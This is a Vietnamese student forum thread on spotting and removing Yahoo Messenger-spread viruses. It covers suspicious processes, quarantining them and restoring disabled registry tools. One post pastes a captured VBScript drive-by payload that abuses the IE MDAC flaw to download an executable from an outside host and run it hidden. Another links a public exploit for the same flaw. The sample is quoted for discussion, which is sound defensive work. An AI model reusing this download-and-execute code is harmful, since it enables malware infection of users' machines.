Cách nhận biết và diệt Virus qua Y!M

[Vũ Chí Hiếu (Shadowhunter2005)]

Thông thường mọi người hay dùng Y!M để share những đường link cho nhau, do đó có nhiều kẻ xấu đã lợi dụng điều này bằng việc dùng các loại virus fát tán qua Y!M để thu thập các thông tin cá nhân hay acc các trò chơi online v.v

Trên đây tôi đã thử nhiễm virus của trang thuviennhac.biz và đã gỡ nó ra rất dễ dàng ( tôi dùng virtual machine chạy Windows 2000 )
1. Cách nhận biết
Có 3 cách để biết
- Chạy yahoo messenger khi đang chat nó tự hiện ra 1 cửa sổ rồi biến mất tiêu.
- Chạy task manager hay regedit và đều nhận đc lời từ chối fũ fàng nó bị cấm bởi người quản trị của bạn (ặc ặc mình là người quản trị chứ còn ai vào đây nữa )
- Nhận fản hồi từ người khác trong friend list

2. Diệt trừ
Các bạn yên tâm đi, do những thằng viết virus đều là dạng amateur nên diệt trừ virus này vô cùng dễ dàng ( đừng có bạn nào ngu mà mua BKAV PRO nhé )
B1 : Tải security task manager http://www.neuber.com/taskmanager/ , tuy đây là bản trial nhưng khi hết hạn nó vẫn còn tính năng chính nên vẫn dùng tốt

B2: Bật lên nào
Hệ thống thử nghiệm của tôi chỉ cài acdsee 7.0 , yahoo messenger và yahoo toolbar, internetdownload manager, do đó hệ thống này rất "sạch" :

Và sau khi vào trang đó, chúng ta có thêm 1 số process mới

Tôi đã đánh dấu 3 process nghi ngờ, chúng bị nghi ngờ vì những lý do sau đâu
-3 mạch có tên là bkav.com và taskmsg là những tên ko đúng với phần mềm chính gốc nó là BKAV và TASKMGR
- Thư mục cài đặt, tại sao BKAV là đc cài ở thư mục temp nhỉ ????
- Thông tin thêm : nó ghi là autoit v3 , điều đấy chẳng có ý nghĩa zì cả
- Nhà sản xuất : ko có
Các process còn lại thì các fần trên rất rõ ràng do đó ko có vấn đề zì cả
Và bạn hãy tiêu diệt nó bằng cách chọn process cần tiêu diệt và nhấn del rồi chọn Move to quarantine rồi nhấn YES
Virus hoàn toàn bị tiêu diệt

3. Dọn sạch máy tính
Khi thâm nhập vào máy để tránh bị tiêu diệt tức thì, virus đã làm vô hiệu hoá regedit và task manager để tránh bị tiêu diệt gọn. Bạn có thể
dùng các phần mềm chỉnh sửa regedit khác như Reghance download từ http://www.majorgeeks.com/RegHance_d468.html. Sau đó vào khoá HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System và xoá 2 khoá DisableRegistryTools và DisableTaskMgr đi. Hoặc có thể làm lại user mới

 

[Phạm Duy Phúc (Phạm Duy Phúc)]

Có 3 cách để biết

Có 4 :
Tự add nick mình vào
xem có bị tự spam không

Các bạn yên tâm đi, do những thằng viết virus đều là dạng amateur

Nhầm oài lão .. đấy là mấy thằng bị phát hiện thôi, lão NTQ code virus YM! Love có khả năng tự biến đổi, diệt Bkav Pro cũng hông được -> dùng Hjacek this ! và fix bug MDAC của IE là hay nhất
P/s :

- Thông tin thêm : nó ghi là autoit v3 , điều đấy chẳng có ý nghĩa zì cả

Lão chưa đọc code con này rồi, nó code qua AutoIT mà ..

- Nhà sản xuất : ko có

Hì, nếu virus đời sau không cho vô Temp mà là Program Files và Nó chỉnh Product Name nữa thì sao .. theo tớ check bên *reg (registration) theo cái Hjack là hay nhất

 

[Vũ Chí Hiếu (Shadowhunter2005)]

Dùng Hijack dễ die lắm vì không cẩn thận là xoá nhầm khoá quan trọng của Windows, dùng cái này ko những có thể giải quyết đc con virus Y!M và còn rất an toàn nữa.
Còn về cách fix bug của IE, đề nghị cho đường link, ko đc khoe rồi để đấy , tôi dùng IE 7 nên ko rõ cách này lắm
Ngoài ra còn 1 cách rất hay dùng ZoneAlarm kiểm soát hành vi nữa nhưng cũng phức tạp

Cái nhà sản xuất ko đơn giản thế đâu bạn ơi nếu bạn đổi thành Microsoft thì nó sẽ mở ngoặc là ( not verified ) nữa cho nên các virus luôn ko để nhà sản xuất ( còn tại sao thì các bạn nên đọc thêm các quyển về mã hoá và giải mã hoá)

Nếu như các bạn ko thể biết đó là process nào thì cứ thử end process từng cái 1 rồi xem còn bị nữa ko

Tốt nhất là ko click vào link nào nữa thế là xong ..............................

 

[Lê Việt Bách (The Bull)]

Bấm thử vào link chúng nó gửi thì buồn cười vãi: ) )

dùng ie thì đừng bấm http:dungcobam//stb.tsukuba-ac.jp/tranquocthang/

<script language="VBScript">
/*
on error resume next
dl = "http://stb.tsukuba-ac.jp/tranquocthang/antivi.exekhongdcbam"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="vnsecurity.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
*/
</script>

) ) mấy trang rồi,toàn cái code này,tò mò down thử về thì thấy icon của nó là VHS .Công nhận IE gà thật,đoạn code vớ vẩn này mà cũng chết

Tốt nhất là ko click vào link nào nữa thế là xong ..............................

click vào học đc khối cái hay ho.

 

[Phạm Duy Phúc (Phạm Duy Phúc)]

Trần Quốc Thắng - Thắng Vẹo JP ...
VHS vừa bị chơi, lão có nick không mượn vô lại

click vào học đc khối cái hay ho.

Ùah, hay thật, nhưng em lão có khoái mấy con VBScript này không, làm vớ vẩn, con nào cũng như con nào, tụi viết virus chỉ được cái liều ngu .. không bao la như ActiveX của IE

Công nhận IE gà thật,đoạn code vớ vẩn này mà cũng chết

THì đó, vẫn cái bug MDAC mà , xem thêm với code MSF:
http://milw0rm.com/exploits/2164

Dùng Hijack dễ die lắm vì không cẩn thận là xoá nhầm khoá quan trọng của Windows, dùng cái này ko những có thể giải quyết đc con virus Y!M và còn rất an toàn nữa.
Còn về cách fix bug của IE, đề nghị cho đường link, ko đc khoe rồi để đấy , tôi dùng IE 7 nên ko rõ cách này lắm
Ngoài ra còn 1 cách rất hay dùng ZoneAlarm kiểm soát hành vi nữa nhưng cũng phức tạp

Cái nhà sản xuất ko đơn giản thế đâu bạn ơi nếu bạn đổi thành Microsoft thì nó sẽ mở ngoặc là ( not verified ) nữa cho nên các virus luôn ko để nhà sản xuất ( còn tại sao thì các bạn nên đọc thêm các quyển về mã hoá và giải mã hoá)

Nếu như các bạn ko thể biết đó là process nào thì cứ thử end process từng cái 1 rồi xem còn bị nữa ko

Tốt nhất là ko click vào link nào nữa thế là xong ..............................

Đúng là dân tin, kiến thức rất rộng, lúc nào cho em qua mượn vở Tin năm ngoái của lão học thuật toán nhé

Còn về cách fix bug của IE, đề nghị cho đường link, ko đc khoe rồi để đấy , tôi dùng IE 7 nên ko rõ cách này lắm

Cái này chưa nghiên cứu kỹ, lão chờ em tìm hiểu đã ...

Ngoài ra còn 1 cách rất hay dùng ZoneAlarm kiểm soát hành vi nữa nhưng cũng phức tạp

Giới thiệu chút đi lão .. cái này nghe nói là Fire Wall khủng lắm , nhưng thử 1 lần đến đoạn đăng nhập làm member mới cho sử dụng là em uninstall luôn
P/S:

còn tại sao thì các bạn nên đọc thêm các quyển về mã hoá và giải mã hoá

Lão cho em mượn cuốn này luôn
Thanks

 

[Phạm Duy Phúc (Phạm Duy Phúc)]

@PHÚC: mày làm j` mà để CLBV có 8

CHửi nhau bên box tin học nhiều vào
P/S : máy mày bị virus oài :

Quang (9/16/2006 8:48:22 PM): Ghet cai con virus minhnhut.be the ko biet http://viet8x.evonet.ro

 

[Nguyễn Thu Trang (Dô)]

thằng nào ngu thì chết thôi nói j` ai

 

[Lê Việt Bách (The Bull)]

@PHÚC: mày làm j` mà để CLBV có 8

Bước đầu là viết tên thằng Phúc bằng 3 chữ cái ( ( để đc 9 điểm đã.

Còn về cách fix bug của IE, đề nghị cho đường link, ko đc khoe rồi để đấy , tôi dùng IE 7 nên ko rõ cách này lắm

http://mozilla.com/firefox/

Giới thiệu chút đi lão .. cái này nghe nói là Fire Wall khủng lắm , nhưng thử 1 lần đến đoạn đăng nhập làm member mới cho sử dụng là em uninstall luôn

Đọc cho kĩ đi,nó bắt đăng ký member gì đâu,chỉ bắt License key thôi. Cái đấy thì ... >

Có vài bức ảnh khá hay ho:

Cần chú ý là cả hai bức đã đc chụp sau khi refresh cái security task manager kia đến cả chục lần

 

[Trần Bùi Quang (xBLACKWOLF_282x)]

máy mày bị virus oài :

tao biết rồi :-s
cái đấy dùng BKAV diệt đc ko :-/

 

[Vũ Ngân Hà (Galaxy_Buttercup)]

toàn dân pro ở đây thế 8-| tiện, cho hỏi luôn, máy tớ dính cái này thì phải vì thấy task ko hiện, nhưng nó chẳng spam ai trong list, thế cuối cùng có phải là dính hay ko 8-|
mà dùng anti virus cái nào tốt nhất nhỉ
Norton thì nặng quá :-s

 

[Dương Thúy Hà (Clap-clap)]

Nếu dùg fire fox để trình duyệt web thì có lẽ sẽ ko bịnh dính mấy cái viruts YM đâu. Vì khi chẳg may vào fải mấy cái trag đấy, nó sẽ tự độg hiện lên cái khug hỏi là mình có muốn download ko?, còn nền của cái trag đó thì trắg xóa. Thấy dấu hiệu như vầy thì tắt fụt 1 cái là okie, ko bị dính viruts
àh nhưg tất nhiên là trog option mọi người fải ko đc chọn tự độg download

 

[Nguyễn Tuấn Tú B (Shweini)]

Cho mình đóng góp vs,có thể có 1 cak khác để xem các process mà mình ko cần phải down bản trial kia đâu,nếu các bạn có nghe qua đến CSFire Monitor thì dùng các đó tiện lắm,quản lý đc hết các tài nguyên trong PC của mình.
Mới đây thì mình có bị nhiệm con VN8x và cak diệt là xem process nào nghi ngờ lên mạng search thông tin về nó rồi xóa thủ công .Vì các con virus của VN thì các CT diệt virus nc ngoài ko thể nhận diện đc
@Hà: dùng Bitdefender đi bạn

 

[Phạm Duy Phúc (Phạm Duy Phúc)]

toàn dân pro ở đây thế tiện, cho hỏi luôn, máy tớ dính cái này thì phải vì thấy task ko hiện, nhưng nó chẳng spam ai trong list, thế cuối cùng có phải là dính hay ko
mà dùng anti virus cái nào tốt nhất nhỉ
Norton thì nặng quá

Hic, cái này mới thuộc dạng nguy hiểm, nhỡ là trojan thì sao

mà dùng anti virus cái nào tốt nhất nhỉ

Tùy, BitDefender với Norton khá nặng, thử Kaspersky với Symantec AV xem

tao biết rồi
cái đấy dùng BKAV diệt đc ko

Thử xem, tao có dùng BKAV bao giờ đâu

 

[Hoàng Quốc Nam (baby_chicken)]

bitdefender có nặng j` đâu :|
mà hôm nọ dính virus Y!M chả hiểu anh bit làm cái quái j` :|
chẳng nhẽ ... bit ko diệt được mấy con virus việt nam rẻ tiền à T__T

 

[Nguyễn Quốc Huy (Vipgirl7790)]

Em dùng kaspersky + tuneup 2006 , vẫn chưa bị dính vius :-s

 

[Hoàng Quốc Nam (baby_chicken)]

kaspersky ko được đánh giá cao = bitdefender đâu ; ))
vậy tại sao mình vẫn dính vidút nhỉ :| T__T

 

[Phạm Duy Phúc (Phạm Duy Phúc)]

chẳng nhẽ ... bit ko diệt được mấy con virus việt nam rẻ tiền à T__T

Đúng là nó không bằng BitDef. nhưng Kaspersky có chế độ defense web khá mạnh, vô mấy cái trang đấy nó sẽ notice mình kiểu dạng "HTML.Exploit" luôn .
Kas còn có mode khi cài là cái j` quên mất tiêu oài ... thì rate tốc độ quét của Kas là mạnh nhất
P.S : vẫn phải tùy ng` dùng thôi
@Quang - check it out http://fire-lion.com/software/IEProtector/download/IEProtectorSetup20.zip

 

[Trần Bùi Quang (xBLACKWOLF_282x)]

PHÚC ơi
tao bị warn 10% chỉ vi` hôm qua hỏi mày làm thế nào để ĐCL có 8 )

 

[Dương Ngọc Minh (ntranc15)]

Bit 9 thì nhẹ thôi, sang bit 10 nó kiêm lắm thứ quá nên giật tung.

 

[Phạm Duy Phúc (Phạm Duy Phúc)]

PHÚC ơi
tao bị warn 10% chỉ vi` hôm qua hỏi mày làm thế nào để ĐCL có 8

Sao tao biết đc.
Tao bị warn 90% rồi, giờ không dám làm giề nữa =((